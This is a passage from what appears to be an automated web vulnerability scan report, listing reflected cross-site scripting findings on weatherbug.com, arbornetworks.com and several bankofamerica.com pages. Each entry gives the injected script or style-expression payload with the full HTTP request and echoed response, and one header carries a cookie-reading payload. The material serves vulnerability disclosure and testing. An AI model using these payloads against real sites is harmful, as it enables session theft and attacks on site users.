<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href='/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more84351'><img src=a onerror=alert(1)>b4355392092#comments'>
...[SNIP]...

2.68. http://weather.weatherbug.com/desktop-weather/web-widgets/getSticker.html [ZCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /desktop-weather/web-widgets/getSticker.html

Issue detail

The value of the ZCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82c7f"style%3d"x%3aexpression(alert(1))"3660fe20f2a was submitted in the ZCode parameter. This input was echoed as 82c7f"style="x:expression(alert(1))"3660fe20f2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /desktop-weather/web-widgets/getSticker.html?CityCode=800326&ZCode=z554582c7f"style%3d"x%3aexpression(alert(1))"3660fe20f2a&Size=250x250&StationID=VMMC&units=1&Version=2 HTTP/1.1
Host: weather.weatherbug.com
Proxy-Connection: keep-alive
Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1465904929-1294800439843; s_vi=[CS]v1|26968B0D051593FE-600001A2C00484CA[CE]; OAX=rcHW800tFhsAALQo; RMAM=01TFSM_.4fI8bZDG|TFSM_1700.4fKIQL6G|; wxbug_cookie1=camera_id=&dma=&lang_id=en-US&zip=&city=50064&postal_code=&stat=SABE&city_name=Buenos Aires&state_code=&state_name=&country=AR&country_name=Argentina&region=10&region_name=South America&units=0&has_cookies=1; RMFD=011PdrDqO101FnC|O101FnE|O101GDp; wxbug_cookie2=&country_name0=Argentina&state_code0=&city_name0=Buenos Aires&zip0=&stat0=SABE&country_name1=USA&state_code1=&city_name1=&zip1=&stat1=SABE&country_name2=&state_code2=&city_name2=&zip2=&stat2=&country_name3=&state_code3=&city_name3=&zip3=&stat3=&country_name4=&state_code4=&city_name4=&zip4=&stat4=; __utma_a2a=6534489744.1326357366.1294800440.1295040624.1295040629.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=utf-8
p3p: CP="NON DSP COR NID"
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 01:33:32 GMT
Connection: close
Content-Length: 2116


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>WeatherBug&r
...[SNIP]...
<a href="http://weather.weatherbug.com/Macau/Macao-weather.html?zcode=z554582c7f"style="x:expression(alert(1))"3660fe20f2a&units=1&stat=VMMC" target='_blank'>
...[SNIP]...

2.69. http://weather.weatherbug.com/desktop-weather/web-widgets/getSticker.html [ZCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /desktop-weather/web-widgets/getSticker.html

Issue detail

The value of the ZCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cce12'style%3d'x%3aexpression(alert(1))'28b5d32a9d was submitted in the ZCode parameter. This input was echoed as cce12'style='x:expression(alert(1))'28b5d32a9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /desktop-weather/web-widgets/getSticker.html?CityCode=800326&ZCode=z5545cce12'style%3d'x%3aexpression(alert(1))'28b5d32a9d&Size=250x250&StationID=VMMC&units=1&Version=2 HTTP/1.1
Host: weather.weatherbug.com
Proxy-Connection: keep-alive
Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1465904929-1294800439843; s_vi=[CS]v1|26968B0D051593FE-600001A2C00484CA[CE]; OAX=rcHW800tFhsAALQo; RMAM=01TFSM_.4fI8bZDG|TFSM_1700.4fKIQL6G|; wxbug_cookie1=camera_id=&dma=&lang_id=en-US&zip=&city=50064&postal_code=&stat=SABE&city_name=Buenos Aires&state_code=&state_name=&country=AR&country_name=Argentina&region=10&region_name=South America&units=0&has_cookies=1; RMFD=011PdrDqO101FnC|O101FnE|O101GDp; wxbug_cookie2=&country_name0=Argentina&state_code0=&city_name0=Buenos Aires&zip0=&stat0=SABE&country_name1=USA&state_code1=&city_name1=&zip1=&stat1=SABE&country_name2=&state_code2=&city_name2=&zip2=&stat2=&country_name3=&state_code3=&city_name3=&zip3=&stat3=&country_name4=&state_code4=&city_name4=&zip4=&stat4=; __utma_a2a=6534489744.1326357366.1294800440.1295040624.1295040629.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=utf-8
p3p: CP="NON DSP COR NID"
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 01:33:34 GMT
Connection: close
Content-Length: 2113


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>WeatherBug&r
...[SNIP]...
<a href='http://weather.weatherbug.com/Macau/Macao-weather.html?zcode=z5545cce12'style='x:expression(alert(1))'28b5d32a9d&units=1&stat=VMMC' target='_blank' style='text-decoration:none;'>
...[SNIP]...

2.70. http://www.arbornetworks.com/index.php [Itemid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /index.php

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 889f8"><script>alert(1)</script>a4569f63444 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?option=com_performs&formid=20&Itemid=76889f8"><script>alert(1)</script>a4569f63444&id=112 HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:50:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=41c910c218fb8d3dde5e7afce882c91b; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:24 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:24 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:25 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:50:28 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html
Content-Length: 37618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<form enctype="multipart/form-data" method="post" action="/index.php?option=com_performs&formid=20&Itemid=76889f8"><script>alert(1)</script>a4569f63444&id=112&Itemid=76889f8\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;a4569f63444&id=112" name="InfrastructureSecurityReport"
id="InfrastructureSecurityReport">
...[SNIP]...

2.71. http://www.arbornetworks.com/index.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /index.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba0d0"><script>alert(1)</script>718295ddb4 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?option=com_performs&formid=20&Itemid=76&id=112ba0d0"><script>alert(1)</script>718295ddb4 HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:50:44 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=fadd3809d81b132b8f85a5e9ab0ae0d9; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:45 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:45 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:46 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:50:48 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html
Content-Length: 38715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<form enctype="multipart/form-data" method="post" action="/index.php?option=com_performs&formid=20&Itemid=76&id=112ba0d0"><script>alert(1)</script>718295ddb4&Itemid=76&id=112ba0d0\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;718295ddb4" name="InfrastructureSecurityReport"
id="InfrastructureSecurityReport">
...[SNIP]...

2.72. http://www.arbornetworks.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 458c5"><script>alert(1)</script>6fafaf87cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?option=com_performs&formid=20&Itemid=76&id=112&458c5"><script>alert(1)</script>6fafaf87cd=1 HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:51:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=6050b437cb834c6dd502f609c181f33c; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:51:16 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:51:16 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:51:17 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:51:17 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html
Content-Length: 38736


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<form enctype="multipart/form-data" method="post" action="/index.php?option=com_performs&formid=20&Itemid=76&id=112&458c5"><script>alert(1)</script>6fafaf87cd=1&Itemid=76&id=112" name="InfrastructureSecurityReport"
id="InfrastructureSecurityReport">
...[SNIP]...

2.73. http://www.bankofamerica.com/creditcards/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /creditcards/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b49"><script>alert(1)</script>f4d8274700e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /creditcardsa4b49"><script>alert(1)</script>f4d8274700e/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:10 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/creditcardsa4b49"><script>alert(1)</script>f4d8274700e/index.cfm">
...[SNIP]...

2.74. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /deposits/checksave/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fa1"><script>alert(1)</script>1cb498be8e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /depositse9fa1"><script>alert(1)</script>1cb498be8e3/checksave/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:53 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1655092907.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/depositse9fa1"><script>alert(1)</script>1cb498be8e3/checksave/index.cfm">
...[SNIP]...

2.75. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /deposits/checksave/index.cfm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491c6"><script>alert(1)</script>20cb5e334dd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /deposits/checksave491c6"><script>alert(1)</script>20cb5e334dd/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:54 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/deposits/checksave491c6"><script>alert(1)</script>20cb5e334dd/index.cfm">
...[SNIP]...

2.76. http://www.bankofamerica.com/financialtools/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /financialtools/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac50f"><script>alert(1)</script>4765bb30cc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /financialtoolsac50f"><script>alert(1)</script>4765bb30cc9/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:36:08 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/financialtoolsac50f"><script>alert(1)</script>4765bb30cc9/index.cfm">
...[SNIP]...

2.77. http://www.bankofamerica.com/findit/locator.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /findit/locator.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bee12"><script>alert(1)</script>8e3b0539708 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /finditbee12"><script>alert(1)</script>8e3b0539708/locator.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:35:37 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/finditbee12"><script>alert(1)</script>8e3b0539708/locator.cfm">
...[SNIP]...

2.78. http://www.bankofamerica.com/help/equalhousing.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/equalhousing.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58bd1"><script>alert(1)</script>2153a6eecc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /help58bd1"><script>alert(1)</script>2153a6eecc8/equalhousing.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:33:29 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/help58bd1"><script>alert(1)</script>2153a6eecc8/equalhousing.cfm">
...[SNIP]...

2.79. http://www.bankofamerica.com/help/equalhousing_popup.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/equalhousing_popup.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddc5"><script>alert(1)</script>c62490d0000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /helpbddc5"><script>alert(1)</script>c62490d0000/equalhousing_popup.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:25 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1453766315.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/helpbddc5"><script>alert(1)</script>c62490d0000/equalhousing_popup.cfm">
...[SNIP]...

2.80. http://www.bankofamerica.com/help/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec464"><script>alert(1)</script>899a7c53100 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /helpec464"><script>alert(1)</script>899a7c53100/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 404 Object Not Found
